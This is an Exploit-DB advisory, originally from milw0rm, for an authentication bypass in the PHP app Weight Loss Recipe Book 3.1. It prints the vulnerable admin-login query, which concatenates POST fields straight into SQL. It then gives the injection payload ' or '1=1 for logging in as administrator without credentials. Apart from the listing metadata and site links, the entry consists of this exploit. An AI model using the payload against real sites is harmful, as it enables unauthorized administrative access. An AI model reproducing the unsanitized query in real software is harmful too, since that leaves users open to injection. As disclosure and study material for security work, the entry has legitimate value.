Weight Loss Recipe Book 3.1 - Authentication Bypass

EDB-ID:

7728

CVE:

EDB Verified:

Author:

x0r

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-01-11

Vulnerable App:

###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Emails: x0r@live.it \ andry2000@hotmail.it
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In \wlrb_files\admin-login.php

SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1

##############################

Greetz: EdGaR :P

# milw0rm.com [2009-01-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services